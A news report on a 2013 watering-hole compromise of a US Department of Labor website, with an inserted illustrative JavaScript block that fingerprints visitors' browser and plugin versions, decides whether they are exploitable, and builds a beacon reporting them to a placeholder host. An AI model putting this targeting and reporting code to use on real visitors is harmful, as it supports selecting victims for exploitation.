The US government’s Department of Labor website has been compromised, either by the Chinese threat actor known as DeepPanda or by an affiliated individual or group, putting every visitor to the site at risk of infection.
AlienVault Labs uncovered the malicious activity, with director Jaime Blasco telling TechWeekEurope he suspected it was a nation state sponsored attack.
Blasco believes this is a watering hole attack, where attackers infect websites they know their targets visit regularly. US government officials could well be a target, he said, noting how the eventual aim is to get a backdoor on the victims’ machines to execute whatever malicious code they want.
“There are Chinese guys behind this attack,” Blasco said, noting how the attack methods were similar to previous ones on US and non-US organisations. “They are looking for specific victims who are regularly visiting this website from the US government.
“In terms of the kind of attack, and the attacks we have analysed in the past, it is very likely this is state sponsored.
“A lot of people will probably visit that website and they could get infected.”
The compromised site was seen serving a JavaScript file that profiles the visitor’s machine for the attacker, including whether it runs popular antivirus products.
The script also enumerates installed software such as Flash and Java, checking whether exploitable versions are present on the machine.
All of that data is sent back to the attacker’s server, which then attempts to exploit a vulnerability in Microsoft Internet Explorer versions 6 through 8 that Microsoft has already patched.
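To make the reconnaissance step concrete, here is an added example of the shape such a profiling script takes. It is not the script served from the compromised site and is not AlienVault’s code: it reads the browser version from the user agent, looks for Flash and Java in the plugin list, decides whether the host looks exploitable, and encodes the result as a beacon the attacker’s server would receive. The version cut-offs, the beacon URL (`http://example.invalid/report`) and the sample `navigator` object are all assumptions constructed for illustration; the page does not say how the real script detected antivirus, so that check is left out. Internet Explorer of that era did not expose a usable `navigator.plugins` list and would have needed ActiveX probing instead, so the plugin-list approach here is also an assumption chosen for portability.

```javascript
"use strict";

// Added example (not the script served from the compromised DOL site).
// `nav` is passed in rather than read from window.navigator so the same
// logic runs under Node for offline testing.

// Parse the first three numeric components in a string into integers,
// e.g. "Shockwave Flash 11.5 r502" -> [11, 5, 502]. Returns null if none.
function parseVersion(text) {
  const parts = (String(text || "").match(/\d+/g) || []).slice(0, 3).map(Number);
  return parts.length ? parts : null;
}

// Lexicographic comparison of version arrays; missing components count as 0.
// Returns -1, 0 or 1.
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Build the host profile the script reports back: IE major version from the
// user agent, and Flash/Java versions from the plugin list. The Java version
// is taken from the plugin name (Oracle's plugin put it there as "SE 7 U17").
function profileHost(nav) {
  const ie = /MSIE (\d+)/.exec(nav.userAgent || "");
  const profile = {
    ua: nav.userAgent || "",
    ie: ie ? Number(ie[1]) : null,
    flash: null,
    java: null,
  };
  for (const p of nav.plugins || []) {
    const name = p.name || "";
    if (/shockwave flash/i.test(name)) profile.flash = parseVersion(p.description);
    else if (/java/i.test(name)) profile.java = parseVersion(name) || parseVersion(p.description);
  }
  return profile;
}

// Hypothetical targeting policy (an assumption, not the real attacker's):
// IE 6 through 8, as the article reports, or Flash/Java older than the cut-offs.
const POLICY = {
  ieRange: [6, 8],
  flashBelow: [11, 6, 0],
  javaBelow: [7, 21],
};

// Returns the list of reasons the host qualifies; empty means "do not attack".
function shouldAttack(profile, policy = POLICY) {
  const reasons = [];
  if (profile.ie !== null && profile.ie >= policy.ieRange[0] && profile.ie <= policy.ieRange[1]) {
    reasons.push("ie" + profile.ie);
  }
  if (profile.flash && compareVersions(profile.flash, policy.flashBelow) < 0) reasons.push("flash");
  if (profile.java && compareVersions(profile.java, policy.javaBelow) < 0) reasons.push("java");
  return reasons;
}

// Encode the profile as the query string of a beacon request. The real
// script's report format is not given on the page; this is one plausible shape.
function buildBeacon(profile, base) {
  const q = new URLSearchParams({
    ie: profile.ie === null ? "" : String(profile.ie),
    flash: profile.flash ? profile.flash.join(".") : "",
    java: profile.java ? profile.java.join(".") : "",
    ua: profile.ua,
  });
  return base + "?" + q.toString();
}

// Constructed sample navigator for an offline run (not a real capture).
const SAMPLE_NAV = {
  userAgent: "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
  plugins: [
    { name: "Shockwave Flash", description: "Shockwave Flash 11.5 r502" },
    { name: "Java(TM) Platform SE 7 U17", description: "Next Generation Java Plug-in 10.17.2 for Mozilla browsers" },
  ],
};

if (typeof require !== "undefined" && require.main === module) {
  const profile = profileHost(SAMPLE_NAV);
  console.log(profile);
  console.log(shouldAttack(profile));
  console.log(buildBeacon(profile, "http://example.invalid/report"));
}
```

The defensive reading of this is the inverse of what the script does: a visitor running a current browser with no Flash or Java plugin produces an empty reason list and is never handed the exploit, which is why such attacks go unnoticed by well-patched analysts while still catching the intended targets.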
If the exploit succeeds, malware is downloaded onto the victim’s PC and connects to command-and-control infrastructure that AlienVault Labs believes is used by the Chinese threat actor DeepPanda.
Only two of the 46 antivirus products on VirusTotal detected the malware.
It is unclear whether the site has been cleansed of the malicious code. The US Department of Labor had not responded to a request for comment at the time of publication.
“We have identified some watering holes in government sites in the past, but this one is very important, as it is one of the main US sites for that branch of the government,” Blasco added.
Various attacks on US organisations have been attributed to China, which has subsequently denied all allegations. Attacks on media organisations, including the New York Times, were linked to the country, as were widespread hits carried out by a group known as APT1.
UPDATE: The US Department of Labor offered the following statement to TechWeek: “On May 1 2013, the Department of Labor (DOL) confirmed that a website related to a DOL program appeared to be compromised. The website was immediately taken offline and the Department began working with appropriate internal and external authorities to investigate and to mitigate any potential impacts.
“The website will remain offline until DOL completes its initial investigation. At this time there is no evidence of compromise to or loss of DOL information nor is there any disruption in DOL’s services. The Department will continue the investigation and will ensure that appropriate precautions and safeguards remain in place to protect our information and information systems.”